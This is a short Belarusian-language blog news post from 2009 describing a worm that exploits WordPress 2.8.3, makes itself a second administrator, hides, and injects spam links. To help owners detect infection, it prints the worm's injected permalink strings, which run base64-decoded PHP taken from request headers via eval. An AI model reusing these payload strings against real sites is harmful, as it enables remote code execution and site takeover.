Subscribe feed

Масавае заражэнне блогаў на WordPress

7 верасня 2009

Месяц назад стала вядома аб новай крытычнай уразлівасці ў WordPress 2.8.3, якая дазваляе лёгка змяніць адміністратарскі пароль у выдаленым рэжыме. Пасля гэтага выйшаў WordPress 2.8.4, ліквідавалы гэтую ўразлівасць. Аднак, як апынулася, далёка не ўсе блогеры сочаць за абнаўленнямі.

У гэтыя выходныя вылілася сапраўдная эпідэмія новага віруса, які дзівіць блогі на рухавічку WordPress 2.8.3 і больш ранніх версій у галінцы 2.8.

Чарвяк рэгіструецца ў блогу, запускае шкоднасны код праз структуру permalink і робіць сябе другім адмінам, потым запускае скрыпт для сцірання сябе са старонкі карыстачоў і пачынае  дадаваць спам і спасылкі на шкоднасны кантэнт у архіўныя топікі.

Прысутнасць шкодніка даволі складана выявіць адразу, тым больш калі ён яшчэ нічога не апублікаваў. Для гэтага трэба праверыць фид permalinks/rss на прысутнасць наступнага кода.


%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

або

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

або памылкі

‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’

Калі ёсць такі код або фид зламаны, то блог інфікаваны.

Працэдура выдалення чарвяка ўяўляе сабой  нетрывіяльную задачу .


рэкамендуем прачытаць таксама

Каментаванне не дазволенае.

Rambler's Top100